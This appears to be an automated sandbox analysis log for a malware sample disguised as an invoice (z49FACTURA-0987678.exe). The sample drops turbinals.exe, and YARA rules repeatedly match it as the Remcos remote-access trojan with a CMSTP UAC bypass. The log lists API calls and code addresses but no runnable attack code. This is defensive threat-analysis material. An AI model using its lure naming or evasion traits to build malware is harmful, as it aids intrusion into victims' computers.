                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_00F285B0 GetCurrentProcess,OpenProcessToken,CloseHandle,CreateProcessWithLogonW,0_2_00F285B0
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_00F351BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_00F351BD
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeCode function: 2_2_00D451BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,2_2_00D451BD
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_00EFD9750_2_00EFD975
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_00EDFCE00_2_00EDFCE0
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_00EF21C50_2_00EF21C5
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_00F062D20_2_00F062D2
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_00F503DA0_2_00F503DA
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_00F0242E0_2_00F0242E
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_00EF25FA0_2_00EF25FA
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_00EE66E10_2_00EE66E1
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_00EDE6A00_2_00EDE6A0
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_00F2E6160_2_00F2E616
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_00F0878F0_2_00F0878F
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_00F388890_2_00F38889
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_00F508570_2_00F50857
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_00F068440_2_00F06844
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_00EE88080_2_00EE8808
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_00EFCB210_2_00EFCB21
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_00F06DB60_2_00F06DB6
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_00EE6F9E0_2_00EE6F9E
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_00EE30300_2_00EE3030
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_00EFF1D90_2_00EFF1D9
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_00EF31870_2_00EF3187
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_00ED12870_2_00ED1287
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_00EF14840_2_00EF1484
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_00EE55200_2_00EE5520
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_00EF76960_2_00EF7696
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_00EE57600_2_00EE5760
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_00EF19780_2_00EF1978
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_00F09AB50_2_00F09AB5
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_00F57DDB0_2_00F57DDB
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_00EFBDA60_2_00EFBDA6
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_00EF1D900_2_00EF1D90
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_00EE3FE00_2_00EE3FE0
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_00EDDF000_2_00EDDF00
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_011704C80_2_011704C8
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeCode function: 2_2_00D0D9752_2_00D0D975
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeCode function: 2_2_00CEFCE02_2_00CEFCE0
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeCode function: 2_2_00D021C52_2_00D021C5
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeCode function: 2_2_00D162D22_2_00D162D2
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeCode function: 2_2_00D603DA2_2_00D603DA
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeCode function: 2_2_00D1242E2_2_00D1242E
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeCode function: 2_2_00D025FA2_2_00D025FA
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeCode function: 2_2_00CF66E12_2_00CF66E1
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeCode function: 2_2_00CEE6A02_2_00CEE6A0
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeCode function: 2_2_00D3E6162_2_00D3E616
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeCode function: 2_2_00D1878F2_2_00D1878F
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeCode function: 2_2_00D488892_2_00D48889
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeCode function: 2_2_00D608572_2_00D60857
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeCode function: 2_2_00D168442_2_00D16844
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeCode function: 2_2_00CF88082_2_00CF8808
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeCode function: 2_2_00D0CB212_2_00D0CB21
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeCode function: 2_2_00D16DB62_2_00D16DB6
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeCode function: 2_2_00CF6F9E2_2_00CF6F9E
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeCode function: 2_2_00CF30302_2_00CF3030
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeCode function: 2_2_00D0F1D92_2_00D0F1D9
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeCode function: 2_2_00D031872_2_00D03187
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeCode function: 2_2_00CE12872_2_00CE1287
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeCode function: 2_2_00D014842_2_00D01484
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeCode function: 2_2_00CF55202_2_00CF5520
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeCode function: 2_2_00D076962_2_00D07696
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeCode function: 2_2_00CF57602_2_00CF5760
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeCode function: 2_2_00D019782_2_00D01978
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeCode function: 2_2_00D19AB52_2_00D19AB5
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeCode function: 2_2_00D67DDB2_2_00D67DDB
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeCode function: 2_2_00D01D902_2_00D01D90
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeCode function: 2_2_00D0BDA62_2_00D0BDA6
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeCode function: 2_2_00CF3FE02_2_00CF3FE0
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeCode function: 2_2_00CEDF002_2_00CEDF00
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeCode function: 2_2_00FF34382_2_00FF3438
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: String function: 00EF0AE3 appears 70 times
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: String function: 00ED7DE1 appears 35 times
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: String function: 00EF8900 appears 42 times
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeCode function: String function: 00CE7DE1 appears 35 times
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeCode function: String function: 00D08900 appears 42 times
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeCode function: String function: 00D00AE3 appears 70 times
                    Source: z49FACTURA-0987678.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                    Source: 13.2.turbinals.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 13.2.turbinals.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 13.2.turbinals.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 10.2.turbinals.exe.ec0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 10.2.turbinals.exe.ec0000.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 10.2.turbinals.exe.ec0000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 13.2.turbinals.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 13.2.turbinals.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 13.2.turbinals.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 3.2.turbinals.exe.3bb0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 3.2.turbinals.exe.3bb0000.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 3.2.turbinals.exe.3bb0000.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 3.2.turbinals.exe.3bb0000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 3.2.turbinals.exe.3bb0000.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 3.2.turbinals.exe.3bb0000.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 13.2.turbinals.exe.3180000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 13.2.turbinals.exe.3180000.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 13.2.turbinals.exe.3180000.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 2.2.turbinals.exe.3490000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 2.2.turbinals.exe.3490000.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 2.2.turbinals.exe.3490000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 3.2.turbinals.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 3.2.turbinals.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 3.2.turbinals.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 9.2.turbinals.exe.1d00000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 9.2.turbinals.exe.1d00000.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 9.2.turbinals.exe.1d00000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 9.2.turbinals.exe.1d00000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 9.2.turbinals.exe.1d00000.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 9.2.turbinals.exe.1d00000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 3.2.turbinals.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 3.2.turbinals.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 3.2.turbinals.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 13.2.turbinals.exe.3180000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 13.2.turbinals.exe.3180000.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 13.2.turbinals.exe.3180000.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 11.2.turbinals.exe.35d0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 11.2.turbinals.exe.35d0000.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 11.2.turbinals.exe.35d0000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 10.2.turbinals.exe.ec0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 10.2.turbinals.exe.ec0000.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 10.2.turbinals.exe.ec0000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 2.2.turbinals.exe.3490000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 2.2.turbinals.exe.3490000.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 2.2.turbinals.exe.3490000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 11.2.turbinals.exe.35d0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 11.2.turbinals.exe.35d0000.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 11.2.turbinals.exe.35d0000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
